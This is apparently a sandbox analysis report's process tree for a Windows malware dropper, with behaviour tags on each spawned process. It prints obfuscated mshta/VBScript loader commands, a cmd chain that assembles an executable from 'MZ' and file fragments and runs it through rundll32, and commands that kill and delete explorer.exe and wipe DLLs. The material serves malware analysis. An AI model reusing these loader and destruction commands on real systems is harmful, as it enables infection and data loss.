C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ROTvtAkvU5hsf3cGIbnsGJit.exe"C:\Users\Admin\Pictures\Adobe Films\ROTvtAkvU5hsf3cGIbnsGJit.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2483327.scr"C:\Users\Admin\AppData\Roaming\2483327.scr" /S7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\4944009.scr"C:\Users\Admin\AppData\Roaming\4944009.scr" /S7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\8460512.scr"C:\Users\Admin\AppData\Roaming\8460512.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\3313489.scr"C:\Users\Admin\AppData\Roaming\3313489.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\2423863.scr"C:\Users\Admin\AppData\Roaming\2423863.scr" /S7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5748237.scr"C:\Users\Admin\AppData\Roaming\5748237.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\8871820.scr"C:\Users\Admin\AppData\Roaming\8871820.scr" /S6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\4387696.scr"C:\Users\Admin\AppData\Roaming\4387696.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\8907188.scr"C:\Users\Admin\AppData\Roaming\8907188.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\1625681.scr"C:\Users\Admin\AppData\Roaming\1625681.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1625681.scr"C:\Users\Admin\AppData\Roaming\1625681.scr"7⤵
-
-
-
C:\Users\Admin\AppData\Roaming\4540442.scr"C:\Users\Admin\AppData\Roaming\4540442.scr" /S6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3408 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 19926⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-ILAHR.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-ILAHR.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3017A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-FGJHH.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGJHH.tmp\Thu16f3de88a335950bb.tmp" /SL5="$4017A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-5OTNA.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-5OTNA.tmp\postback.exe" ss19⤵
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xdc,0x114,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471811⤵
-
-
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵
- Executes dropped EXE
-
C:\66cb58917ec17ad1527490e29caeec\Setup.exeC:\66cb58917ec17ad1527490e29caeec\\Setup.exe /q /norestart /x86 /x64 /web10⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv 25y1SdoBZEKwsHgy6qEapg.01⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16466b26f8b7.exeThu16466b26f8b7.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 3082⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f584bd3686.exeThu16f584bd3686.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 2123⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3332 -ip 33321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1068 -ip 10681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3408 -ip 34081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4296 -ip 42961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2532 -ip 25321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6120 -ip 61201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6132 -ip 61321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5272 -ip 52721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5700 -ip 57001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5300 -ip 53001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5428 -ip 54281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5492 -ip 54921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2452 -ip 24521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6048 -ip 60481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\EE1A.exeC:\Users\Admin\AppData\Local\Temp\EE1A.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\EE1A.exeC:\Users\Admin\AppData\Local\Temp\EE1A.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4788 -ip 47881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\462.exeC:\Users\Admin\AppData\Local\Temp\462.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\462.exeC:\Users\Admin\AppData\Local\Temp\462.exe2⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 6088 -ip 60881⤵
-
C:\Users\Admin\AppData\Local\Temp\3769.exeC:\Users\Admin\AppData\Local\Temp\3769.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 2362⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\4D35.exeC:\Users\Admin\AppData\Local\Temp\4D35.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\6755.exeC:\Users\Admin\AppData\Local\Temp\6755.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\7A03.exeC:\Users\Admin\AppData\Local\Temp\7A03.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 3002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\8E29.exeC:\Users\Admin\AppData\Local\Temp\8E29.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3104 -ip 31041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7068 -ip 70681⤵
-
C:\Users\Admin\AppData\Local\Temp\9D1E.exeC:\Users\Admin\AppData\Local\Temp\9D1E.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im explorer.exe /f & timeout /t 6 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im explorer.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\A0B9.exeC:\Users\Admin\AppData\Local\Temp\A0B9.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3148 -ip 31481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1744 -ip 17441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C21ACC666574A4894FBCB669CDE90FE8 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 300F36DC215A0C52D0B34C13BB5A6DFE C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D07123CDE91D24338EE2433C9A790E2D2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe" -silent=1 -CID=764 -SID=764 -submn=default3⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ffcaf8adec0,0x7ffcaf8aded0,0x7ffcaf8adee05⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:25⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=1912 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=2068 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2456 /prefetch:15⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3060 /prefetch:25⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3536 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3380 /prefetch:85⤵
-
-
